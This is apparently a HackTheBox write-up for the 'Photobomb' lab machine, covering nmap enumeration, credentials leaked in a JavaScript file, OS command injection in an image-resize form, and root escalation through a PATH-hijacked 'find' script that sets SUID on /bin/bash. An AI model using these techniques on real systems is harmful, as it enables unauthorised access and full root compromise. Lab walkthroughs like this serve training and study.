🐧 Photobomb

Sat Feb 11, 2023

Just Released Machine Hackthebox Linux Easy Web Command Execution Path Hijacking Javascript

This is my writeup for the Photobomb machine on the Hackthebox plateform.

Let’s start with an nmap scan to enumerate the different open ports. There is only 2 ports open :

Port 22 (SSH)
Port 80 (HTTP)

> nmap -sC -sV 10.10.11.182

Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-30 16:25 CET
Nmap scan report for 10.10.11.182
Host is up (0.095s latency).
Not shown: 799 closed ports, 199 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds

Website

When we go to the website via the IP address, we are redirected to the domain photobomb.htb. You can add it to our /etc/hosts file.

> curl -v http://10.10.11.180

*   Trying 10.10.11.182:80...
* Connected to 10.10.11.182 (10.10.11.182) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.11.182
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.18.0 (Ubuntu)
< Date: Mon, 30 Jan 2023 15:26:28 GMT
< Content-Type: text/html
< Content-Length: 154
< Connection: keep-alive
< Location: http://photobomb.htb/

The main webpage doesn’t seem to have any special functionality and contain only a link.

Main Website

The Click Here button redirect to /printer which ask for a basic authentication.

Basic

If we look at the javascript file named photobomb.js loaded by the server, we can find credentials to access /printer.

pH0t0:b0Mb!

Javascript

The printer page allows a user to download images with custom size. We can try to download a photo with the smallest size (30x20) to avoid waiting a long time to resize the image.

Printer

The Burp Suite scanner finds OS command injection in the following parameters :

filetype
dimensions

Burp

To check if this scan isn’t a false positive, we can inject the sleep command and verify if the server responds with a 10 second delay.

Sleep

Now, we have validated the injection and we can trigger a reverse-shell to obtain a first access to the server.

Curl Shell

Privesc

By listing the privileges of the wizard’s user, we see interesting things. Wizard can run as root the script /opt/cleanup.sh.

wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

The script is readable and executable for all users, so we can read it to find a vulnerability.

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

There is 2 binary which have a relative path :

cd
find

We can perform a PATH hijacking attack in order to execute another command than find or cd when executing the script : https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-command-suid-binary-without-command-path

wizard@photobomb:/tmp$ cat /tmp/find
#!/bin/bash

chmod u+s /bin/bash

wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
wizard@photobomb:/tmp$ bash -p

bash-5.0# id
uid=1000(wizard) gid=1000(wizard) euid=0(root) groups=1000(wizard)